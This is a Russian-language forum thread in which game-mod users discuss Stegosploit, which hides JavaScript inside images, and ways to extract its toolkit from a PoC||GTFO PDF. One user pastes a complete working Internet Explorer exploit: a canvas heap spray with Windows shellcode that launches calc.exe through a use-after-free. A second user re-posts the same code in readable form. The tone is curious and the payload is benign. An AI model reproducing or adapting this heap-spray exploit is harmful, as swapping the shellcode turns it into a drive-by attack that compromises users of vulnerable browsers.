GIF/JPEG/HTML, или как издеваются над браузерами Опции

[hippocamus]

И это срабатывает только с png? Jpeg так можно заразить?

[feanor]

Лол, мне сегодня тред как раз в жилу пришелся.
На работе побырику склепал отдачу макетов писем через генерацию хтмлки с маймтайпом ворда и доковским расширением.
Удивительный мир программирования, да.

[AGG]

Боишься, как бы графику не воровали?

Ну вот же Оrziе переживал, что его графику кто-нибудь без спросу будет с форума брать, и Feаnоr тоже, а вот теперь я для них скрипт собрал! Теперь никто их графику не возьмёт, а если возьмёт, то стыдно будет! Вот Гехард Стейн, например. Он все кампании из T-800 mod засунул в свою сборку и даже в авторах не написал, у кого взял. А теперь он следующую кампанию так без спросу просто взять и вставить уже не сможет, так как будет появлятся надпись с правильными credits. И ему будет стыдно! Вот!

Те же единороссы уже много лет народ обворовывают. Это типаж такой. И твой Стйен такой же.

[t800]

И это срабатывает только с png? Jpeg так можно заразить?

Ну вообще свой stegosploit Самуил Шах для JPG и сделал просто его скрипт для T-800 mod не подходит потому что все картинки для мода мне же надо в PNG делать, поэтому я сделал сборку на скрипте Бхарадвая Мачирая который тот написал как раз для PNG за что ему большое спасиба!

[hippocamus]

t800
и какой вредоносный javascript-код может нести этот стегосплойт?
Ничего более опасного, чем зацикленный alert или openwindow (и то - нормальные браузеры отловят и остановят такой сценарий) - не представляю. Ну или какой-нибудь спам рассылать.

[t800]

t800
и какой вредоносный javascript-код может нести этот стегосплойт?
Ничего более опасного, чем зацикленный alert или openwindow (и то - нормальные браузеры отловят и остановят такой сценарий) - не представляю. Ну или какой-нибудь спам рассылать.

Ну Самуил Шах говорит что если вcтавить в изображение вот это

Код

function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flat
ten=function(){for(var f=0;f<this.d.length;f++){var n=this.d[f];if(typeof(n)=='
number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a){retur
n(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);t
his.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0
;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a)
{for(var c=0,b=0;c<a.data.length;c++,b++){if(b>=8192){b=0}a.data[c]=(b<this.f.l
ength)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=
0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var
a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=
a}};H5.prototype.setData=function(a){this.d=a};var flag=false;var heap=new H5()
;try{location.href='ms-help:'}catch(e){}function spray(){var a='\xfc\xe8\x89\x0
0\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x
28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\
xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a
\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x3
1\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x
75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\
x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb
\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf
0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\x
bb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00';var
c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)}c.push(1371756627);c.push(137
1351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,20212
2400,202122404,64,202116108,202121248,16384];var d=c.concat(f);d.push(a);heap.s
etData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<10
0;a++){c.push(document.createElement('img'))}if(flag){document.getElementById('
fm').innerHTML='';CollectGarbage();var b='\u2020\u0c0c';for(var a=4;a<110;a+=2)
{b+='\u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run(){spray();
document.getElementById('c2').checked=true;document.getElementById('c2').onprop
ertychange=changer;flag=true;document.getElementById('fm').reset()}setTimeout(r
un,1000);

То стегосплоит запускает калькулятор (работает под Windows 7 и в IE ) я не проверял потому, что для этого нужна Windows 7 да мне это и не надо чтобы запускался калькулятор я же хотел сделать чтобы stegosploilt выводил кредитсы.

[Эроласт]

работает под Windows 7 и в IE

А, лол, ну да, IE8 - то еще решето. Здесь его уязвимость с памятью эксплуатируется.
Вот только вопрос - кого ты атаковать собрался?) Этим браузером уже никто в здравом уме не пользуется.

[t800]

работает под Windows 7 и в IE

А, лол, ну да, IE8 - то еще решето. Здесь его уязвимость с памятью эксплуатируется.
Вот только вопрос - кого ты атаковать собрался?) Этим браузером уже никто в здравом уме не пользуется.

Атаковать? Я вобще никого не собирался атаковать. Просто я хотел сделать так чтобы PNG картинки из T-800 Mod могли выводить кредитсы. Я написал в гугле "Исполняемый PNG" нашел статью про Stegosploit, потом нашел скрипт Бхарадвая Мачирая, сделал как он пишет и все получилось. Вот!

[tolich]

Походу, это уже тренд.

[feanor]

Здесь его уязвимость с памятью эксплуатируется.

А можно гнусных подробностей (лень гуглить, да)?

Этим браузером уже никто в здравом уме не пользуется.

В здравом - нет, а так - добро пожаловать в не менее удивительный мир корпоративных ИС.

[t800]

Походу, это уже тренд.

Какой то жадный он этот дядька вставил Stegosploit в Белку и требует за это денег

Pretty radical, eh? Send money to: lcamtuf@coredump.cx

[feanor]

Почему требует-то?)
Обычная просьба о донате.

[tolich]

Он ещё и радикал!

[SerAlexandr]

И какой он радикал? Свободный? Углеводородный? Кубический?

[Эроласт]

А можно гнусных подробностей (лень гуглить, да)?

Подробностей не подскажу, я в низкий уровень не умею) Когда-то слышал об этой уязвимости, как работает - хз.

Ну, вот так код выглядит, если восстановить форматирование:

(Раскрыть)

Код

function H5() {
    this.d = [];
    this.m = new Array();
    this.f = new Array()
}

H5.prototype.flatten = function () {
    for (var f = 0; f < this.d.length; f++) {
        var n = this.d[f];
        
        if (typeof (n) == 'number') {
            var c = n.toString(16);
            
            while (c.length < 8) {
                c = '0' + c
            }
            
            var l = function (a) {
                return (parseInt(c.substr(a, 2), 16))
            };
            
            var g = l(6),
            h = l(4),
            k = l(2),
            m = l(0);
            this.f.push(g);
            this.f.push(h);
            this.f.push(k);
            this.f.push(m)
        }
        
        if (typeof (n) == 'string') {
            for (var d = 0; d < n.length; d++) {
                this.f.push(n.charCodeAt(d))
            }
        }
    }
};

H5.prototype.fill = function (a) {
    for (var c = 0, b = 0; c < a.data.length; c++, b++) {
        if (b >= 8192) {
            b = 0
        }
        
        a.data[c] = (b < this.f.length) ? this.f[b] : 255;
    }
};

H5.prototype.spray = function (d) {
    this.flatten();
    
    for (var b = 0; b < d; b++) {
        var c = document.createElement('canvas');
        c.width = 131072;
        c.height = 1;
        var a = c.getContext('2d').createImageData(c.width, c.height);
        this.fill(a);
        this.m[b] = a;
    }
};

H5.prototype.setData = function (a) {
    this.d = a;
};

var flag = false;
var heap = new H5();

try {
    location.href = 'ms-help:'
} catch (e) {}

function spray() {
    var a = '\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00';
    var c = [];
    
    for (var b = 0; b < 1104; b += 4) {
        c.push(1371756628);
    }
    
    c.push(1371756627);
    c.push(1371351263);
    
    var f = [
        1371756626,
        215,
        2147353344,
        1371367674,
        202122408,
        4294967295,
        202122400,
        202122404,
        64,
        202116108,
        202121248,
        16384
    ];
    
    var d = c.concat(f);
    d.push(a);
    heap.setData(d);
    heap.spray(256);
}

function changer() {
    var c = new Array();
    
    for (var a = 0; a < 100; a++) {
        c.push(document.createElement('img'));
    }
    
    if (flag) {
        document.getElementById('fm').innerHTML = '';
        CollectGarbage();
        var b = '\u2020\u0c0c';
        
        for (var a = 4; a < 110; a += 2) {
            b += '\u4242';
        }
        
        for (var a = 0; a < c.length; a++) {
            c[a].title = b;
        }
    }
}

function run() {
    spray();
    document.getElementById('c2').checked = true;
    document.getElementById('c2').onpropertychange = changer;
    flag = true;
    document.getElementById('fm').reset();
}

setTimeout(run, 1000);

Запись в прототип - это так в старом JS методы класса объявляли.
И, похоже, это все-таки для IE9, потому что в IE8 canvas еще не было.

[t800]

Вообще это Самуил Шах очень веселый. Прямо как Шерлок Холмс.

Он взял и свой Stegosploit Toolkit v0.2 запакавал в картинку и добавил ее в PDF файл

The Stegosploit Toolkit v0.2, released in Issue 0x08 of Poc||GTFO, contains the tools necessary to test image based exploit delivery. The toolkit is distributed as a PNG polyglot within the PoC||GTFO PDF, which is also a polyglot!

The PNG file - stegosploit_tool.png contains all the tools. For a simple demo, you can save it to the local desktop, rename it to HTML and open it in a browser. Clicking the lioness will trigger the decoder and it will extract the toolkit from the pixels and download it. For a complex demo, this PNG has to be uploaded somewhere, and techniques such as MIME type confusion or Content Sniffing have to be used to trick the browser into believing it is an HTML file.

Я закачал этот его PDF попробовал извлечь вложенные файлы PDF командой

Код

pdftk pocorgtfo08.pdf unpack_files

Но никаких вложения не извлеклись и поэтому я стал искать другой скрипт и нашел скрипт от Бхарадвая Мачирая и на нем сделал сборку для подписи картиное.

А теперь даже интересно а как извлечь из PDF этот Stegosploit Toolkit v0.2 Самуила Шаха (хотя он мне не нужен потому что у меня уже есть скрип от который все что мне надо делает, в JPG-и мне не нужны) но все равно интересно
как же его надо извлекать.

[Эроласт]

интересно а как извлечь из PDF этот Stegosploit Toolkit v0.2 Самуила Шаха

Так в твоей цитате же инструкция:

The PNG file - stegosploit_tool.png contains all the tools. For a simple demo, you can save it to the local desktop, rename it to HTML and open it in a browser. Clicking the lioness will trigger the decoder and it will extract the toolkit from the pixels and download it.

[t800]

интересно а как извлечь из PDF этот Stegosploit Toolkit v0.2 Самуила Шаха

Так в твоей цитате же инструкция:

The PNG file - stegosploit_tool.png contains all the tools. For a simple demo, you can save it to the local desktop, rename it to HTML and open it in a browser. Clicking the lioness will trigger the decoder and it will extract the toolkit from the pixels and download it.

Эту инструкию я давно перевел. Это про то как извевлечь Stegosploit Toolkit v0.2 из изображение.
А вот как извлечь само изображение из PDF? И самое главное что никакой картинки с львицей в PDF нет.
Я сейчас попробовал извлечь картинки камандой

Код

pdfimages pocorgtfo08.pdf output

Она мне извлекла штук сто всяких картинок и среди них картинку толстого кота (может это и есть львица)
но сколько я ее не переименовывал в HTML и не кликал на кота ничего не никуд не извлеклось
Вот она эта картинка с котом.

[t800]

Фух получилось! Оказывается этот кот вовсе не львица. А львица вот она какая должна быть.

 lioness.jpg ( 216.5 килобайт ) Кол-во скачиваний: 16


А вот и сам Tool Kit какой был в картинке, только без эксплоита (его я их архива убрал потому что все равно он никому не нужен и чтобы SF не ругался)

[hippocamus]

Вот она эта картинка с котом.

Как ни странно, это - не кот. Это животное называется Манул, и именно эта картинка - подарок из ВКонтакте - является известным интернет-мемом.

Только пришлось сохранить ее как JPG

Логично, так как это jpeg.